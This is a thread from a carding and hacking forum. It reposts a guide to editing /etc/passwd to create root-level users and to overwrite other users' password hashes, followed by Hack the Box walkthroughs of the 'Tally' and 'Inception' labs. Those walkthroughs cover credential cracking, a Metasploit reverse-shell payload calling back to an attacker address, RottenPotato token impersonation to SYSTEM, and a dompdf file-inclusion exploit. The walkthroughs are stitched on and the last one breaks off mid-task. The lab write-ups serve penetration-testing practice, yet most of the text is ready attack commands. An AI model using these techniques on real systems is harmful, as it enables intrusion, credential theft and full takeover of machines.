+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Editing /etc/passwd File for Privilege Escalation (/Thread-Guide-How-to-Editing-etc-passwd-File-for-Privilege-Escalation)
[Guide] How to Editing /etc/passwd File for Privilege Escalation - NINZA - 05-14-2020
In this article, we will learn “Various methods to alter etc/passwd file to create or modify a user for root privileges”. Sometimes, it is necessary to know ‘how to edit your own user for privilege escalation in the machine’ inside /etc/passwd file, once the target is compromised. You can read our previous article where we had applied this trick for privilege escalation. Open the links given below:
[To see content please register here]
: Hack the Box Challenge: Apocalyst Walkthrough[To see content please register here]
: Hack the Hackday Albania VM (CTF Challenge)Firstly, we should be aware of /etc/passwd file in depth before reaching the point. Inside etc directory, we will get three most important files i.e. passwd, group, and shadow.
etc/passwd: It is a human-readable text file which stores information of user account.
etc/group: It is also a human-readable text file which stores group information as well as user belongs to which group can be identified through this file.
etc/shadow: It is a file that contains encrypted password and information of the account expire for any user.
The format of details in /passwd File
![[Image: 0.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-T7mSt3TuJFo/WvbkVfmmViI/AAAAAAAAW0Y/Db4b8D36XQQSXh3DREfXVt8gSiPsO7EBwCLcBGAs/s1600/0.png?w=687)
![[Image: 1.1.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-JlUe4xMReCo/WvbkVBafMLI/AAAAAAAAW0U/e3WBMka5w-UBboTIVLE6utYPkkFLuVwDACLcBGAs/s1600/1.1.png?w=687)
Get into its Details Description
Username: First filed indicates the name of the user which is used to login.
Encrypted password: The X denotes encrypted password which is actually stored inside /shadow file. If the user does not have a password, then the password field will have an *(asterisk).
User Id (UID): Every user must be allotted a user ID (UID). UID 0 (zero) is kept for root user and UIDs 1-99 are kept for further predefined accounts, UID 100-999 are kept by the system for the administrative purpose. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given the UID of 1001.
Group Id (GID): It denotes the group of each user; like as UIDs, the first 100 GIDs are usually kept for system use. The GID of 0 relates to the root group and the GID of 1000 usually signifies the users. New groups are generally allotted GIDs begins from 1000.
Gecos Field: Usually, this is a set of comma-separated values that tells more details related to the users. The format for the GECOS field denotes the following information:
User’s full name
Building and room number or contact person
Office telephone number
Home telephone number
Any other contact information
Home Directory: Denotes the path of the user’s home directory, where all his files and programs are stored. If there is no specified directory then / becomes user’s directory.
Shell: It denotes the full path of the default shell that executes the command (by the user) and displays the results.
NOTE: Each field is separated by (colon)
Let’s Start Now!!
Adding User by Default Method
Let’s first open /etc/passwd file through cat command, to view the present users available in our system.
![[Image: 1.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-2kj7MmmH520/WvbkVeeMAhI/AAAAAAAAW0c/ldtmaSYFqisqarZ4bfob6CKj_UAQgS_-wCLcBGAs/s1600/1.png?w=687)
From the image given above, you can perceive that “raj” is the last user with uid 1000. Here gid 1000 denotes it is a non-system user.
Let see what happens actually in /passwd file, when we add any user with adduser command. So here you can clearly match the following information from below given image.
adduser user1
Username: user1
GID: 1002
UID: 1001
Enter password: (Hidden)
Home Directory: /home/user1
Gecos Filed: Full Name, Room Number, Work phone, Home Phone, Other (are blanked)
![[Image: 2.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-3DUf8uRPCHk/WvbkXJ7lQoI/AAAAAAAAW08/bx6dIcuSkpYam-aWqNidptraqQf9vwQhwCLcBGAs/s1600/2.png?w=687)
When you will open /passwd file then you will notice that all the above information has been stored inside /etc/passwd file.
![[Image: 3.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-3HI9FUhz7aY/WvbkYSFJ_RI/AAAAAAAAW1U/772MaMqD6fgkku1nSd-6Sy_otfrYXOuNQCLcBGAs/s1600/3.png?w=687)
Manually Editing User inside /etc/passwd File
Generally, a normal user has read-only permission for passwd file but sometimes it is also possible that a user has read/write permission, in that scenario we can add our own user inside /etc/passwd file with the help of above theory.
user2:*:1002:1003:,,,:/home/user2:/bin/bash
1
user2:*:1002:1003:,,,:/home/user2:/bin/bash
The *(asterisk) sign denotes empty password for user2.
![[Image: 4.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-nWFqpPn69RQ/WvbkYw2gXsI/AAAAAAAAW1c/odVt8YuU_HswruCnex1oHQTuZyKY8s5cQCLcBGAs/s1600/4.png?w=687)
Since we have allotted 1003 GID for user2, therefore, we need to address it in /etc/group file too.
Follow the format given below:
Syntax: Username:X:GID
Since we don’t have a password, therefore, use * sign at the place of X.
user2:*:1003:
1
user2:*:1003:
![[Image: 5.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-keULd7ciHp0/WvbkZFe5UjI/AAAAAAAAW1g/oSDK71f2HhEveXG56OVXHhIkFPc1a3WMACLcBGAs/s1600/5.png?w=687)
Now, set a password for user2 with passwd command and enter the password.
passwd user2
1
passwd user2
![[Image: 6.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-e6It-zA107I/WvbkZFRCJXI/AAAAAAAAW1k/u1hId4zIbBopRGcO0cMl2msviBvAaWt1wCLcBGAs/s1600/6.png?w=687)
Since we have created a new user ‘user2’ manually without using the adduser command, therefore, we will not find any new entry in /etc/shadow file. But it’s there in the /etc/passwd file, here the * sign has been replaced by encrypted password value. In this way, we can create our own user for privilege escalation.
![[Image: 7.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-y6Vu14RBlKk/WvbkZuXq2dI/AAAAAAAAW1o/gBZuz9ciSsAjszmazvqBBzkjkt970oOTACLcBGAs/s1600/7.png?w=687)
OpenSSL
Sometimes it is not possible to execute passwd command to set the password of a user; in that case, we can use OpenSSL command which will generate an encrypted password with salt.
OpenSSL passwd will compute the hash of the given password using salt string and the MD5-based BSD password algorithm 1.
Syntax: openssl passwd -1 -salt [salt value] {password}
openssl passwd -1 -salt user3 pass123
1
openssl passwd -1 -salt user3 pass123
![[Image: 8.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-DfhkvJ6qgic/WvbkZ6YLU1I/AAAAAAAAW1s/CJEOsdHTuEcdOs-FPThcM58xDl_gEw4GwCLcBGAs/s1600/8.png?w=687)
We will get the encrypted password, after that, open /passwd file by typing vipw command in the terminal and add username manually. Follow the manual step of adding new user “user3” and paste encrypted value at the place of * or X for a password.
In below image you can observe that, I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user3.
![[Image: 9.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-8gMkIjblQmE/WvbkaQNWzbI/AAAAAAAAW1w/LiH8O0Vt9pAcqsP2ypd44123G9dr-7vNQCLcBGAs/s1600/9.png?w=687)
Now switch user and access the terminal through user3 and confirm the root access.
su user3
whoami
id
1
2
3
su user3
whoami
id
YESSSSSS it is working successfully.
Note: You can also modify other user’s password by replacing: X: from your own encrypted passwd and login with that user account using your password
![[Image: 10.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-rWfzThNnu94/WvbkV5RyuVI/AAAAAAAAW0g/v3nlsfDZCqgjI6NTIsUPAxCe2E0AwdENQCLcBGAs/s1600/10.png?w=687)
mkpasswd
mkpasswd is similar to OpenSSL passwd which will generate a hash of given password string.
Syntax: mkpasswd -m [hash type] {password}
mkpasswd -m SHA-512 pass
1
mkpasswd -m SHA-512 pass
![[Image: 11.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-WZycjM43oUA/WvbkV4HXu4I/AAAAAAAAW0k/tWCJmHYqYbM_YBEC7pEnrybZFs4ZwAeXQCLcBGAs/s1600/11.png?w=687)
It will generate a hash for your password string, repeat above step or change the password of other existed users.
If you will compare entry of user1 then you can notice the difference. We have replaced: X: from our hash value.
![[Image: 13.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-eNhYD3J8DRs/WvbkWPuEm7I/AAAAAAAAW0o/qn7-tAsYlRYBVyHRvtE95VjrjCKY34ByQCLcBGAs/s1600/13.png?w=687)
Now switch user and access the terminal through user1 and confirm the root access.
su user1
whoami
id
1
2
3
su user1
whoami
id
Great!! It is also working.
![[Image: 14.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-l6PQS3GK7WA/WvbkWD5sSqI/AAAAAAAAW0s/XyI1fH1EYQorpOVWbC420K9VKSmKxDRpQCLcBGAs/s1600/14.png?w=687)
Python
Using python; we can import crypt library and add salt to our password which will create encrypted password including that salt value.
python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
1
python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
![[Image: 15.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-xowc9gNKAeM/WvbkWhxG0BI/AAAAAAAAW0w/BqMSTbQrRjc8TFYrDM1-ainQwJCU0CO_ACLcBGAs/s1600/15.png?w=687)
It will generate a hash value of your password string, repeat above step or change the password of other existed users. If you will compare entry of user2 then you can notice the difference. We have replaced the old hash value from our new hash value.
![[Image: 16.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-DnqW54jXEVI/WvbkWlI-T7I/AAAAAAAAW00/ajvbsB_yPCgwjOkLsQOkaQLEa1ZJDoLhwCLcBGAs/s1600/16.png?w=687)
Now switch user and access the terminal through user2 and confirm the root access.
su user2
whoami
id
pwd
sudo -l
1
2
3
4
5
su user2
whoami
id
pwd
sudo -l
It is also working, previously it was a member of /home/user2 directory but after becoming a member of /root directory you can notice it has owned all privilege of the root user.
![[Image: 17.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-pNU-GXXr5vs/WvbkWwVHzgI/AAAAAAAAW04/3y0SKl1TdtQcgcy9G7rQYF8HGaJC8wFkACLcBGAs/s1600/17.png?w=687)
Perl
Similarly, we can use Perl along with crypt to generate a hash value for our password using salt value.
perl -le 'print crypt("pass123", "abc")'
1
perl -le 'print crypt("pass123", "abc")'
![[Image: 20.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-G10jnhu04zA/WvbkXfn0bUI/AAAAAAAAW1A/LC3obnp6hWMsG6iT7gwItpdoELO4VtlHgCLcBGAs/s1600/20.png?w=687)
You will get the encrypted password, after that, again open /passwd file by typing vipw command in terminal and add username manually. Follow the manual step of adding new user “user4” and paste encrypted value at the place of * or X for a password.
In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user4.
![[Image: 21.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/--O0Hdq6VwIU/WvbkXVOsdmI/AAAAAAAAW1E/xrg7e-ZyW6oas57NXyM1py2PchBaVIbvQCLcBGAs/s1600/21.png?w=687)
Now switch user and access the terminal through user4 and confirm the root access.
su user4
whoami
id
1
2
3
su user4
whoami
id
Great!! This method is also working.
![[Image: 22.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-k5BV7mJEROU/WvbkXmIBMsI/AAAAAAAAW1I/MVAfORNTSnQSkNs9g0z298nYA1QDE6qvQCLcBGAs/s1600/22.png?w=687)
PHP
Similarly, we can use PHP along with crypt to generate the hash for our password using salt value.
php -r "print(crypt('aarti','123') . \"\n\");"
1
php -r "print(crypt('aarti','123') . \"\n\");"
![[Image: 23.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-K8ciC3zaF8E/WvbkXzNQxGI/AAAAAAAAW1M/fYPP_z69jCQJYLu86mhECiZNEweySmwagCLcBGAs/s1600/23.png?w=687)
You will get the encrypted password, after that, open /passwd file by typing vipw command in terminal and add username manually. Follow the manual step of adding new user “user5” and paste encrypted value in the field of the password.
In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user5.
![[Image: 24.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-JevXNyEVUYU/WvbkYFvBJTI/AAAAAAAAW1Q/dd-4OqtwcXg4QQk9lkIGzszIql8gyH3OQCLcBGAs/s1600/24.png?w=687)
Now switch user and access the terminal through user5 and confirm the root access.
su user5
whoami
id
1
2
3
su user5
whoami
id
Hence there are so many ways to add your own users with root access which is quite helpful to get root privilege in any machine.
![[Image: 25.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-rYqBWyYP1Ik/WvbkY56ldmI/AAAAAAAAW1Y/ZeHyrPyD38A-aGB7kF1kCcUvvS_K-2nZACLcBGAs/s1600/25.png?w=687)
Hello Friends!! Today we are going to solve a CTF Challenge “Tally”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. These labs are designed for beginner to the Expert penetration tester. Tally is a Retired Lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
As these labs are only available online, therefore, they have a static IP. Tally Lab has IP: 10.10.10.59.
Now, as always let’s begin our hacking with the port enumeration.
nmap -A 10.10.10.59
1
nmap -A 10.10.10.59
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-ddXFuyPCIoI/WvHAuY07lsI/AAAAAAAAWwg/IlsSVdBP5SgGktKBbKu3jLoOpEIPBkC9wCLcBGAs/s1600/1.png?w=687&ssl=1)
When you will explore target IP through the browser, it will be redirected to a SharePoint page as shown below which also declared by nmap in the above image.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-VVOucMtBlAs/WvHAxW4YT8I/AAAAAAAAWxM/rlZFOESikNQkCoO0F6Y3vGnahhRDfXbNwCLcBGAs/s1600/2.png?w=687&ssl=1)
Then we have used several directory brute-forcer tools in order to enumerate some useful URL for web directory but failed to retrieve. Then I penetrate for the web directory manually with the help of Google search and slowly and gradually reached at /sitepages/FinanceTeam.aspx and found FTP username as shown below in the image.
Moreover, I found a
[To see content please register here]
for SharePoint directory brute-force attack that helps me in my next step.![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Dy5i9EtvO9E/WvHAzoqN9sI/AAAAAAAAWxs/awen37LQi9cSNHpurqUwuvepg6qv3JwuACLcBGAs/s1600/6.png?w=687&ssl=1)
We found this URL
[To see content please register here]
documents/forms/allitems.aspx from the inside above-given[To see content please register here]
, and when you will open above path in your browser as shown below, you will see a file named “FTP-details”. Download this doc file and open it.![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-o3B86HMDOnM/WvHAz0M3VDI/AAAAAAAAWxw/ppX5wnqa_2kKnlT3PMwfh6B4jBjbcHegQCLcBGAs/s1600/9.png?w=687&ssl=1)
You will get a password from inside ftp details doc file.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-7boGrXkH2tU/WvHAuED_4FI/AAAAAAAAWwc/X7M9nAQgkKsDanJRpqhiyKhrqbvvSGgzwCLcBGAs/s1600/10.png?w=687&ssl=1)
Now login into FTP using following credentials and download tim.kdbx in your local machine.
Username: ftp_user
Password: UTDRSCH53c"$6hys
1
2
Username: ftp_user
Password: UTDRSCH53c"$6hys
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-XBiOTANBAyY/WvHAuSvwcCI/AAAAAAAAWwk/DR9DuUZuJhgRwwZ1qGnNQ8V6FrQMWPBRwCLcBGAs/s1600/12.png?w=687&ssl=1)
Since the file contains .kdbx extension and I don’t know much about it, therefore, I jumped for Google search from there I got this
[To see content please register here]
to download a python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.python keepass2john.py tim.kdbx > tim
1
python keepass2john.py tim.kdbx > tim
Next, we have used John the ripper for decrypting the content of “tim” with help of the following command.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim
1
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-LtBoL_KnPIQ/WvHAu5qPq9I/AAAAAAAAWwo/6LwiUE2sPTsWXtNZfOierEZXrzFL7iTYwCLcBGAs/s1600/13.png?w=687&ssl=1)
When you will obtain the password for “keepass2” which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command:
apt-get install keepass2 -y
1
apt-get install keepass2 -y
After installing, run the below command and submit “simplementeyo” in the field of the master key.
keepass2 tim.kdbx
1
keepass2 tim.kdbx
Then you can find username and password from inside /Work/Windows/Shares for sharing a file through SMB login since port 135-445 are open in targets machine for sharing files.
Here the password is hidden inside * character; copy and paste it into a text file and you will get the password into plain letters I.e. Acc0unting
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-U9h-k-iNU4g/WvHAvU60D1I/AAAAAAAAWww/4cn0rTnc-6QUettR3nrCfY73pM3AzDg3wCLcBGAs/s1600/14.png?w=687&ssl=1)
Now you are having SMB login credential “Finance: Acc0unting”, then execute following command for connecting with targets network and It will show “ACCT” as sharename.
smbclient -L 10.10.10.59 -U Finance
1
smbclient -L 10.10.10.59 -U Finance
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-XbM_KD7YI4E/WvHAvWlyBJI/AAAAAAAAWws/a2_hE_UbsHoZjI0oAj-LzG402L2e2o7fgCLcBGAs/s1600/15.png?w=687&ssl=1)
Further type below commands and at last when you found conn-info.txt, download it.
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt
1
2
3
4
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-gTbKaj0QJds/WvHAvu6h1PI/AAAAAAAAWw0/63raRqGZMkEkFbsrjSTjfJuK_BRSMppCACLcBGAs/s1600/16.png?w=687&ssl=1)
When you will download the conn-info.txt file, open it, it will tell you MSSQL database login credential.
db: sa
pass: YE%TJC%&HYbe5Nw
1
2
db: sa
pass: YE%TJC%&HYbe5Nw
From the below image, you can observe that it was old server details and might be the password for sa has been changed now.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-9i5Ry3TrTgo/WvHAwNXH6RI/AAAAAAAAWw4/N3S8HcynLwkaXLthrWLoRejpnDFoysa-gCLcBGAs/s1600/17.png?w=687&ssl=1)
Again login into SMB and look for next hint by moving into /zz_Migration, for that you need to execute below commands:
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New folder"
1
2
3
4
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New folder"
Here you will found tester.exe, download it.
get tester.exe
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/--ItoqtTOS0c/WvHAwb0Mw7I/AAAAAAAAWxA/ELXlQFRWGH40GZdOFkhBljqwnKzqf6K9wCLcBGAs/s1600/18.png?w=687&ssl=1)
You will get tester.exe inside your /root directory since the file is too large, it is impossible to find desirable information from that. Therefore use grep along with strings command.
![[Image: 19.1.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-jkogsV859q4/WvHAwdwOXYI/AAAAAAAAWw8/i87HVJ7-Chc5zL-g9jXvM74C4Tfg3MbMACLcBGAs/s1600/19.1.png?w=687&ssl=1)
strings tester.exe | grep DATABASE
1
strings tester.exe | grep DATABASE
And you will get a new password for user sa as shown in below image.
![[Image: 19.2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-vfuzs4_m-iY/WvHAxP_XNdI/AAAAAAAAWxI/vgcGx8r6oFUAZKxR8CxrJX2Wf42mi1LqwCLcBGAs/s1600/19.2.png?w=687&ssl=1)
For the next step, I took help from our
[To see content please register here]
article which was on MSSQL penetration testing. Open a new terminal and load Metasploit framework and execute below commands.use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit
1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text for .dll and Paste it inside as CMD command as shown in the next image.
![[Image: 19.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-d8fUNcQNrz0/WvHAw6jgK_I/AAAAAAAAWxE/mU0iBld2w78-ADZxyjt-BJB-yKwc1X6dwCLcBGAs/s1600/19.png?w=687&ssl=1)
Now open a new terminal and again load a new Metasploit framework and execute below commands.
use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit
1
2
3
4
5
use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-h2qYGW4PRpw/WvHAxrz_gaI/AAAAAAAAWxQ/J6kZvyX2Hzs9UU5-tfPCfUB7ShKZoXrAQCLcBGAs/s1600/20.png?w=687&ssl=1)
You will get the meterpreter session of victim’s machine in your 1st Metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type the following:
getuid
1
getuid
So currently we don’t have NT AUTHORITY\SYSTEM permission.
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-5Va1_bVQ8Ls/WvHAxw8D7SI/AAAAAAAAWxU/wlKDmsa1TYwmSlywQFPKZzLTt9RKsHPSACLcBGAs/s1600/21.png?w=687&ssl=1)
But we have successfully grabbed user.txt file from inside /Sarah/Desktop.
cd Sarah/Desktop
ls
cat user.txt
1
2
3
cd Sarah/Desktop
ls
cat user.txt
In this way, we have completed our first task. Now let’s find root.txt!!
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-fCmQx7UC-iA/WvHAyLK8uTI/AAAAAAAAWxY/ewMRWdG_gGU3PF-4ZwuIo8v_U4W2w0fgwCLcBGAs/s1600/22.png?w=687&ssl=1)
load incognito
1
load incognito
Incognito option in the meterpreter session was originally a stand-alone application that permitted you to impersonate user tokens when successfully compromising a system. And then we need to do first is identify if there are any valid tokens on this system
list_tokens -u
1
list_tokens -u
If we talk related to impersonate token then you can see currently there is no token available.
![[Image: 23.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-jvqLb_hkAKY/WvHAyYuuwLI/AAAAAAAAWxc/To2KOzpvQuk2vV9BhIeVtf0yrmrWPmv-wCLcBGAs/s1600/23.png?w=687&ssl=1)
Then I took help from Google in such scenario and found a link for downloading Rottenpotato from GitHub for privilege escalation.
git clone
[To see content please register here]
1
git clone
[To see content please register here]
After downloading it will give rottenpotato.exe file.
![[Image: 24.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-DSMHJCIuauc/WvHAyk4CtmI/AAAAAAAAWxg/lx-2mzCBgG4cZ8veWoztGTe0PgRslm11wCLcBGAs/s1600/24.png?w=687&ssl=1)
Upload the exe file into the victim’s machine.
upload /root/Desktop/RottenPotato/rottenpotato.exe .
1
upload /root/Desktop/RottenPotato/rottenpotato.exe .
Now type below command for executing exe file and then add SYSTEM token under impersonate user tokens.
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
1
2
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
After then when you will run the getuid command again, it will tell you that you have escalated NT AUTHORITY\\SYSTEM
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-d0Fw4LlIplo/WvHAzKr2FhI/AAAAAAAAWxk/7u57iMzI5-chBzetF-j0h99qHC9bH7bgwCLcBGAs/s1600/25.png?w=687&ssl=1)
Then come back to /Users directory and perceive available directories inside it. You will get root.txt form inside C:\Users\Administrator\Desktop go and grab it, and finished the task.
cd Administrator
cd Desktop
ls
cat root.txt
1
2
3
4
cd Administrator
cd Desktop
ls
cat root.txt
Fabulous!! The task has been completed and hacked this box.
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-cEH9qQmNREg/WvHAzpaKkDI/AAAAAAAAWxo/YYlwqfkkPkk0_mKgoukZ-hrW6fKOapE0ACLcBGAs/s1600/27.png?w=687&ssl=1)
Hello friends!! Today we are going to solve another challenge “Inception” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy, you have to use your entire Penetration testing skills. Let start and learn how to breach a network and then exploit it for retrieving desired information.
Level: Hard
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Inception is 10.10.10.67 so let’s start with nmap port enumeration.
nmap -A 10.10.10.67
1
nmap -A 10.10.10.67
From the given below image, you can observe we found port 80 and 3128 are open in the victim’s network.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-nJqLJNpb6QY/WuiKM7ogTCI/AAAAAAAAWng/Uz03m3C8FYw--1EultPsyWuS0XFjWsaOgCLcBGAs/s1600/1.png?w=687&ssl=1)
Knowing port 80 was open on the victim’s network we preferred to explore his IP in the browser and the following image get opened as shown below.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-a6_aeXxGPO0/WuiKPZAZT6I/AAAAAAAAWoE/n0AEJpqjKokY3tvLAW3uVH1TYmv8OsK8ACLcBGAs/s1600/2.png?w=687&ssl=1)
Then we checked its source code and found something “dompdf” which could be a directory, so let’s go through it.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Jg0Dj1NWPHg/WuiKRrawsyI/AAAAAAAAWoo/HDOjrwD9I8csvLLDMSDrYK53SZAQsiJGwCLcBGAs/s1600/3.png?w=687&ssl=1)
So when we had explored /dompdf in the browser, it put up some files. I was interested in version so we opened it and found version 0.6.0
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-EQq0inlNDyk/WuiKTTPqYVI/AAAAAAAAWpA/vpmv4r03PrI6OoMWn56C49ud4HZBhIkZACLcBGAs/s1600/4.png?w=687&ssl=1)
After that with help of searchsploit, we got an exploit 33004.txt for dompdf 0.6.0.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-74CM5upSPNk/WuiKTdlReFI/AAAAAAAAWpE/96PeXjp6LFkCYWCD2eWGmxOJtnj3_b-5ACLcBGAs/s1600/6.png?w=687&ssl=1)
In this exploit, you will get an instance for exploiting the target machine with help of LFI.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-atT2BMetbl0/WuiKUNdrdaI/AAAAAAAAWpM/NYZ83jDnpIEbckdlUHHXdHEM4-9yJRNDwCLcBGAs/s1600/7.png?w=687&ssl=1)
Then without wasting time we look for /etc/passwd file with the help of the following command:
curl
[To see content please register here]
1
curl
[To see content please register here]
But we got an encoded result, therefore, we need to decode it.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-_ysqfE0sSaU/WuiKUHh8e5I/AAAAAAAAWpI/SzwXhE3EYVoMqvSGmml-4a22I_rs0DNcQCLcBGAs/s1600/8.png?w=687&ssl=1)
From given below image you can observe that we have successfully decoded base 64 data and can read first username Cobb.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-2ArMuiEvYSw/WuiKUlTg4iI/AAAAAAAAWpQ/byirHC1U1p4Tcq6_hyuXWo4NNNPWOgz9wCLcBGAs/s1600/9.png?w=687&ssl=1)
And after penetrating very deep, we found default.conf file inside apache which holds another base64 value, now use given below command for that.
[To see content please register here]
1
[To see content please register here]
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-JWeSUI3rlVw/WuiKNctnVQI/AAAAAAAAWnk/lYkUdlMzu1MVuIAGTurBXwcit1AF-KRFgCLcBGAs/s1600/10.png?w=687&ssl=1)
After decoding above found base64 value, you will get a highlighted path for AuthUserFile as shown below in the given image. If you will read the text inside location tag <location>, you will realize that it is giving hint for login credential for /webdev_test_inception and more security details such as authentication type: basic.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-k6a07ZAZ4o0/WuiKNlOo6YI/AAAAAAAAWno/M_8O4kDC4fkddev8aFjPl6gr5u9EXWR3wCLcBGAs/s1600/11.png?w=687&ssl=1)
Again type the following command:
curl
[To see content please register here]
1
curl
[To see content please register here]
Hmmmmm!!! One more base64 value, let’s decode this also.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-h5TI0h7mgYw/WuiKN0AQMQI/AAAAAAAAWns/TDLRSkmEl7wwQxOnRTTlx2A8NW0DFf0HQCLcBGAs/s1600/12.png?w=687&ssl=1)
So when we had decoded above based 64 value and found a hash value for user “webdav_tester” from it. Here we had copied it into a text file and now going to use John the ripper for cracking this hash.
